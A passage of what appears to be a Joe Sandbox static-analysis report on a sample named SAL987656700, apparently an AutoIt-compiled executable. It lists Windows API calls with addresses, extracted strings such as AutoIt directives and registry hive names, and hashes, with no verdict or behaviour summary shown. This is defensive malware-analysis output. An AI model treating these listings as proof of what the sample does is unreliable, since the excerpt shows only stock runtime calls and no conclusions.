                                      • Opcode Fuzzy Hash: 4b4f97fd49c66a320efccdbeb4d37e35a8d255f1c95ec937c222c9cf30d47c30
                                      • Instruction Fuzzy Hash: A7A1C1B225C306FFDB019FA0DC48A9BBBB9FB49320F104A19F962961E1D734E941DB51
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 0090273E
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0090286A
                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009028A9
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009028B9
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00902900
                                      • GetClientRect.USER32(00000000,?), ref: 0090290C
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00902955
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00902964
                                      • GetStockObject.GDI32(00000011), ref: 00902974
                                      • SelectObject.GDI32(00000000,00000000), ref: 00902978
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00902988
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00902991
                                      • DeleteDC.GDI32(00000000), ref: 0090299A
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009029C6
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 009029DD
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00902A1D
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00902A31
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00902A42
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00902A77
                                      • GetStockObject.GDI32(00000011), ref: 00902A82
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00902A8D
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00902A97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 292a5cee5a421ddd75a8b323a162546aff31626b9054f12e420dbe1215cf9da9
                                      • Instruction ID: 8b1c2195710239746f376810750c46dca1ae11c85ceda8475a8c23198c0c83ac
                                      • Opcode Fuzzy Hash: 292a5cee5a421ddd75a8b323a162546aff31626b9054f12e420dbe1215cf9da9
                                      • Instruction Fuzzy Hash: 1DB149B1A50215AFEB14DFA8CC89FAE7BA9FB48711F108114F914E72D0D770AD40CBA0
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F4AED
                                      • GetDriveTypeW.KERNEL32(?,0091CB68,?,\\.\,0091CC08), ref: 008F4BCA
                                      • SetErrorMode.KERNEL32(00000000,0091CB68,?,\\.\,0091CC08), ref: 008F4D36
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 6332743af314e4c8363e423ac5ddb396fa817bddd5e6b5de0d667593aed08e7c
                                      • Instruction ID: 4da985bf3ec1291cb17c83299b2b8039b5a19a054d34f676e9dcbbb9125b62ae
                                      • Opcode Fuzzy Hash: 6332743af314e4c8363e423ac5ddb396fa817bddd5e6b5de0d667593aed08e7c
                                      • Instruction Fuzzy Hash: 2C61B4B064520D9BCB14EF38C981D7A77A0FB86718B246017FA06EB292DB35DD41DB52
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00898E14
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 008D6AC5
                                      • 6F540200.COMCTL32(?,000000FF,?), ref: 008D6AFE
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008D6F43
                                        • Part of subcall function 00898F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00898BE8,?,00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898FC5
                                      • SendMessageW.USER32(?,00001053), ref: 008D6F7F
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008D6F96
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$Window$DestroyF540200InvalidateMoveRect
                                      • String ID: 0
                                      • API String ID: 2339618693-4108050209
                                      • Opcode ID: cb6233843b5290e7075a1af595a6421878fb1bc14610ede1c97c9851d3d4d523
                                      • Instruction ID: f78f293986139fc5d130a5b689efd3b2d2d8ceb1c0ee4ade92f5a98ce9ed2438
                                      • Opcode Fuzzy Hash: cb6233843b5290e7075a1af595a6421878fb1bc14610ede1c97c9851d3d4d523
                                      • Instruction Fuzzy Hash: E712DE7020420ADFCB25DF28D864BA9B7E1FF45314F18866AF495CB261DB31EC61DB91
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00917421
                                      • SetTextColor.GDI32(?,?), ref: 00917425
                                      • GetSysColorBrush.USER32(0000000F), ref: 0091743B
                                      • GetSysColor.USER32(0000000F), ref: 00917446
                                      • CreateSolidBrush.GDI32(?), ref: 0091744B
                                      • GetSysColor.USER32(00000011), ref: 00917463
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00917471
                                      • SelectObject.GDI32(?,00000000), ref: 00917482
                                      • SetBkColor.GDI32(?,00000000), ref: 0091748B
                                      • SelectObject.GDI32(?,?), ref: 00917498
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 009174B7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009174CE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 009174DB
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091752A
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00917554
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00917572
                                      • DrawFocusRect.USER32(?,?), ref: 0091757D
                                      • GetSysColor.USER32(00000011), ref: 0091758E
                                      • SetTextColor.GDI32(?,00000000), ref: 00917596
                                      • DrawTextW.USER32(?,009170F5,000000FF,?,00000000), ref: 009175A8
                                      • SelectObject.GDI32(?,?), ref: 009175BF
                                      • DeleteObject.GDI32(?), ref: 009175CA
                                      • SelectObject.GDI32(?,?), ref: 009175D0
                                      • DeleteObject.GDI32(?), ref: 009175D5
                                      • SetTextColor.GDI32(?,?), ref: 009175DB
                                      • SetBkColor.GDI32(?,?), ref: 009175E5
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: f678fd4b1ffc489d1393e588e8410f918ffbdf771f978558673c544c1679fb51
                                      • Instruction ID: 86e7cb32a0c6f0783d2f501b2b33e2ce1df62cdac21847a168b75ffc73ba77c9
                                      • Opcode Fuzzy Hash: f678fd4b1ffc489d1393e588e8410f918ffbdf771f978558673c544c1679fb51
                                      • Instruction Fuzzy Hash: 2D6170B2A48219BFDF019FA4DC49EEEBF79EB08320F108115F911AB2A1D7749940DB90
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00911128
                                      • GetDesktopWindow.USER32 ref: 0091113D
                                      • GetWindowRect.USER32(00000000), ref: 00911144
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00911199
                                      • DestroyWindow.USER32(?), ref: 009111B9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009111ED
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091120B
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0091121D
                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00911232
                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00911245
                                      • IsWindowVisible.USER32(00000000), ref: 009112A1
                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009112BC
                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009112D0
                                      • GetWindowRect.USER32(00000000,?), ref: 009112E8
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0091130E
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00911328
                                      • CopyRect.USER32(?,?), ref: 0091133F
                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 009113AA
                                      Strings
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 84b27314f0e976f292008b986a251eae3ce80262ca99b42882797ac74e2c6d77
                                      • Instruction ID: 42d4628fdc94d2ca32cb0975e6dd5656f4560adbcb8ea24113a041cd9c854f99
                                      • Opcode Fuzzy Hash: 84b27314f0e976f292008b986a251eae3ce80262ca99b42882797ac74e2c6d77
                                      • Instruction Fuzzy Hash: 58B18071608345AFD714DF64C885BAEBBE4FF88750F00891CFA999B2A1C771E885CB52
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009102E5
                                      • _wcslen.LIBCMT ref: 0091031F
                                      • _wcslen.LIBCMT ref: 00910389
                                      • _wcslen.LIBCMT ref: 009103F1
                                      • _wcslen.LIBCMT ref: 00910475
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009104C5
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00910504
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                        • Part of subcall function 008E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E2258
                                        • Part of subcall function 008E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E228A
                                      Strings
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 1103490817-719923060
                                      • Opcode ID: fd97e1309584ac347693ae7850085c4bd218b85e0eca7ea8924a3400055764ac
                                      • Instruction ID: f22b728feabdd49ab3340b0a0aa47f73e734ec410de351206009883a82f9e877
                                      • Opcode Fuzzy Hash: fd97e1309584ac347693ae7850085c4bd218b85e0eca7ea8924a3400055764ac
                                      • Instruction Fuzzy Hash: 56E1AE313082058FC724EF28C59086AB7EAFFC8754B144A5DF8969B3A1DB71ED85CB52
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00898968
                                      • GetSystemMetrics.USER32(00000007), ref: 00898970
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0089899B
                                      • GetSystemMetrics.USER32(00000008), ref: 008989A3
                                      • GetSystemMetrics.USER32(00000004), ref: 008989C8
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008989E5
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008989F5
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00898A28
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00898A3C
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00898A5A
                                      • GetStockObject.GDI32(00000011), ref: 00898A76
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00898A81
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • SetTimer.USER32(00000000,00000000,00000028,008990FC), ref: 00898AA8
                                      Strings
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 277889f7d87e62f23a8f6e950a2a2239fcb64001aed0f7f74d52177ac089d269
                                      • Instruction ID: 0dfb994e49ecddc587a1fa0f7a430b853283282c617e015cff1a3ddc90b8cc36
                                      • Opcode Fuzzy Hash: 277889f7d87e62f23a8f6e950a2a2239fcb64001aed0f7f74d52177ac089d269
                                      • Instruction Fuzzy Hash: 2CB17A71A4420AEFDF14DFA8D845BAE3BB5FB48315F14422AFA15EB290DB34A840DB51
                                      APIs
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                        • Part of subcall function 008E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                        • Part of subcall function 008E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                        • Part of subcall function 008E10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E0DF5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E0E29
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0E40
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008E0E7A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E0E96
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0EAD
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008E0EB5
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E0EBC
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E0EDD
                                      • CopySid.ADVAPI32(00000000), ref: 008E0EE4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E0F13
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E0F35
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E0F47
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F6E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F75
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F7E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F85
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F8E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F95
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E0FA1
                                      • HeapFree.KERNEL32(00000000), ref: 008E0FA8
                                        • Part of subcall function 008E1193: GetProcessHeap.KERNEL32(00000008,008E0BB1,?,00000000,?,008E0BB1,?), ref: 008E11A1
                                        • Part of subcall function 008E1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E11A8
                                        • Part of subcall function 008E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008E0BB1,?), ref: 008E11B7
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4042927181-0
                                      • Opcode ID: fb52d48b3156ce27381bd84fee9da575eac48f26f3bdc27a2ec118a830295f71
                                      • Instruction ID: 20174723025a5cfc942ffdfe4fea0d1ea5c2b38118ba9bae6a93d0a72598f13b
                                      • Opcode Fuzzy Hash: fb52d48b3156ce27381bd84fee9da575eac48f26f3bdc27a2ec118a830295f71
                                      • Instruction Fuzzy Hash: DF718DB1A0424AABDF209FA5DC44BEEBBB8FF09300F048515F959E6191DB709D55CF60
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090C4BD
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0091CC08,00000000,?,00000000,?,?), ref: 0090C544
                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0090C5A4
                                      • _wcslen.LIBCMT ref: 0090C5F4
                                      • _wcslen.LIBCMT ref: 0090C66F
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0090C6B2
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0090C7C1
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0090C84D
                                      • RegCloseKey.ADVAPI32(?), ref: 0090C881
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090C88E
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0090C960
                                      Strings
                                      Similarity
                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 9721498-966354055
                                      • Opcode ID: 5db753a75fd581d6a6b38b1374d736797d83e333876ef24fec3fbbdc52da5b91
                                      • Instruction ID: 9d326ca60b91fbe0deb0764e1c909ca1ea3811243e1aad4b2f47c5c26141d6ce
                                      • Opcode Fuzzy Hash: 5db753a75fd581d6a6b38b1374d736797d83e333876ef24fec3fbbdc52da5b91
                                      • Instruction Fuzzy Hash: 3A125A756082019FDB14EF18C881A2AB7E5FF89714F14895CF85A9B3A2DB31FD41CB92
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009109C6
                                      • _wcslen.LIBCMT ref: 00910A01
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00910A54
                                      • _wcslen.LIBCMT ref: 00910A8A
                                      • _wcslen.LIBCMT ref: 00910B06
                                      • _wcslen.LIBCMT ref: 00910B81
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                        • Part of subcall function 008E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008E2BFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 1103490817-4258414348
                                      • Opcode ID: f1dd3a973e439eff0e7afb23fc4379372162ed921a49cd681d8d251f42cda6d4
                                      • Instruction ID: 679f958f000e369d39a2c10792c9dfaebbd09f1d849ddb892d753e50d5e35882
                                      • Opcode Fuzzy Hash: f1dd3a973e439eff0e7afb23fc4379372162ed921a49cd681d8d251f42cda6d4
                                      • Instruction Fuzzy Hash: A9E19C352083058FCB14EF28C45096AB7E5FFD8318B14895DF8969B3A2D772ED85CB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 1256254125-909552448
                                      • Opcode ID: 5da3695b855551a638ac17d1dc477992734b6d39c3c3e1035a0d1f61f1bbe5f5
                                      • Instruction ID: 9e235c7fbee0bc8cc0a8affdfa8de3b3261e1c372510964217b9da95f7a7270c
                                      • Opcode Fuzzy Hash: 5da3695b855551a638ac17d1dc477992734b6d39c3c3e1035a0d1f61f1bbe5f5
                                      • Instruction Fuzzy Hash: 7471F3B260016A8FCB20DF6CC9519BF3399ABA1754F650B28FC66E72C5E635CD44C3A1
                                      APIs
                                      • _wcslen.LIBCMT ref: 0091835A
                                      • _wcslen.LIBCMT ref: 0091836E
                                      • _wcslen.LIBCMT ref: 00918391
                                      • _wcslen.LIBCMT ref: 009183B4
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009183F2
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00915BF2), ref: 0091844E
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00918487
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009184CA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00918501
                                      • FreeLibrary.KERNEL32(?), ref: 0091850D
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091851D
                                      • DestroyCursor.USER32(?), ref: 0091852C
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00918549
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00918555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 391920613-1154884017
                                      • Opcode ID: 6356dd7e4a74147849c1202e6168eb7c1532ebb34f44ce3274e0322a3c99ed41
                                      • Instruction ID: a976b6bf4b43711ce3d3376c018d1774300e24733b96daf734dcc20e643d0331
                                      • Opcode Fuzzy Hash: 6356dd7e4a74147849c1202e6168eb7c1532ebb34f44ce3274e0322a3c99ed41
                                      • Instruction Fuzzy Hash: 8C61BDB1644219BAEB149F64CC81BFF77ACFB44B11F108649F815D60E1DFB4A990EBA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 0-1645009161
                                      • Opcode ID: 54f307cbb41b75be94d4804f31d7703f4b98a1aa39f996f05f874a7a6f7b664c
                                      • Instruction ID: 3d29d337457fd40c4ef9d9d317331fecc4c4946fd3804392f779eb4b97125a6a
                                      • Opcode Fuzzy Hash: 54f307cbb41b75be94d4804f31d7703f4b98a1aa39f996f05f874a7a6f7b664c
                                      • Instruction Fuzzy Hash: 2B81E271644609ABDF20BF64CC42FAE77B8FF55300F184025F905EA196EB74EA51C7A2
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 008E5A2E
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008E5A40
                                      • SetWindowTextW.USER32(?,?), ref: 008E5A57
                                      • GetDlgItem.USER32(?,000003EA), ref: 008E5A6C
                                      • SetWindowTextW.USER32(00000000,?), ref: 008E5A72
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5A82
                                      • SetWindowTextW.USER32(00000000,?), ref: 008E5A88
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008E5AA9
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008E5AC3
                                      • GetWindowRect.USER32(?,?), ref: 008E5ACC
                                      • _wcslen.LIBCMT ref: 008E5B33
                                      • SetWindowTextW.USER32(?,?), ref: 008E5B6F
                                      • GetDesktopWindow.USER32 ref: 008E5B75
                                      • GetWindowRect.USER32(00000000), ref: 008E5B7C
                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008E5BD3
                                      • GetClientRect.USER32(?,?), ref: 008E5BE0
                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 008E5C05
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008E5C2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
